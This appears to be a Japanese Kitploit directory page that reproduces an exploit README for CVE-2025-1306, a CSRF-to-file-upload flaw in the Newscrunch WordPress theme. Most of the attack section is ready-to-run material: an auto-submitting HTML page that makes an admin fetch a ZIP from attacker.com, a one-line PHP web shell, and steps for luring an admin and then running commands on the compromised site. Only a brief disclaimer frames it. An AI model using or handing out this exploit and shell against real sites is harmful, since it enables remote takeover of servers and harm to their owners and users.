Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - クロスサイトリクエストフォージェリによる任意のファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-1306
フィッシングツールペイロード生成エクスプロイトウェブアプリケーション悪用学習と教育
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - クロスサイトリクエストフォージェリによる任意のファイルアップロード

リポジトリを見る
5141年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Newscrunch エクスプロイト (CVE-2025-1306)

🚨 概要

このエクスプロイトは、Newscrunch WordPress テーマ の クロスサイトリクエストフォージェリ (CSRF) から任意ファイルアップロード に至る脆弱性 (CVE-2025-1306) を標的としています。newscrunch_install_and_activate_plugin() 関数に nonce 検証 が欠如しているため、認証されていない攻撃者 は、ログイン済みの管理者をだまして任意のファイルをサーバーにアップロードさせ、リモートコード実行 (RCE) につなげることができます。


🔥 脆弱性の詳細

  • CVE ID: CVE-2025-1306
  • 影響を受けるソフトウェア: Newscrunch WordPress テーマ (<= 1.8.4)
  • CWE 分類: CWE-352 - クロスサイトリクエストフォージェリ (CSRF)
  • CVSS スコア: 8.8 (高)
  • ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • 公開日: 2025年3月4日

🛑 深刻度と影響

  • ✅ リモートコード実行 (RCE)
  • ✅ システム全体の侵害
  • ✅ CSRF ベースの任意ファイルアップロード
  • ✅ 認証不要の攻撃ベクトル

悪用可能性: 管理者が細工された悪意のあるリンクを訪問する必要があります。


📜 エクスプロイトコード

このエクスプロイトは、認証済みの管理者 に対し、Web シェルを含む悪意のある ZIP ファイルをアップロードする CSRF 攻撃 を実行させます。

🔹 PoC - HTML エクスプロイト

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 置き換え:

  • http://target.com/ を 脆弱な WordPress サイト に
  • http://attacker.com/shell.zip を Web シェルを含む 悪意のある ZIP ペイロード に

🔹 悪意のある PHP シェルの例

<?php system($_GET['cmd']); ?>

📌 悪用に成功した後、シェルにアクセスします:

http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 使用方法

  1. 攻撃者が管理する Web サイト上に HTML ファイルをホストします。
  2. 認証済みの WordPress 管理者に悪意のあるリンクを送信します。
  3. 管理者がページを訪問すると、シェルが自動的にアップロードされます。
  4. 以下を使用して コマンドをリモートで実行します:
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ 免責事項

このツールは教育およびセキュリティ研究目的のみで使用してください。 脆弱性の不正な悪用は違法であり、法律で罰せられます。作者は、このツールによって引き起こされた誤用や損害について 責任を負いません。責任を持って使用してください。


ツールをダウンロード